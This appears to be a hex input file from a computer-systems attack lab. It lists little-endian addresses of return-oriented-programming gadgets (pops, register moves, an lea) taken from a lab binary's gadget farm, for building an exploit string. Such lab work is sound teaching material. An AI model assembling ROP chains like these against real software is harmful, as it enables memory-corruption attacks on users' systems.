/* ========================= */
/* LIST OF GADGETS FROM FARM */
/* ========================= */

/* popq rax (Gadget) */
2a 17 40 00 00 00 00 00

/* popq rcx (Gadget) */
59 17 40 00 00 00 00 00

/* movq rax, rdi (Gadget) */
2f 17 40 00 00 00 00 00

/* movq eax, edi (Gadget) */
30 17 40 00 00 00 00 00

/* movq rsp, rax (Gadget) */
fd 17 40 00 00 00 00 00

/* movl esp, eax (Gadget) */
72 17 40 00 00 00 00 00

/* movl eax, edx (Gadget) */
a0 17 40 00 00 00 00 00

/* movl ecx, esi (Gadget) */
8c 17 40 00 00 00 00 00

/* movl edx, ecx (Gadget) */
64 17 40 00 00 00 00 00

/* lea (rdi,rsi,1), rax (Gadget) */
48 17 40 00 00 00 00 00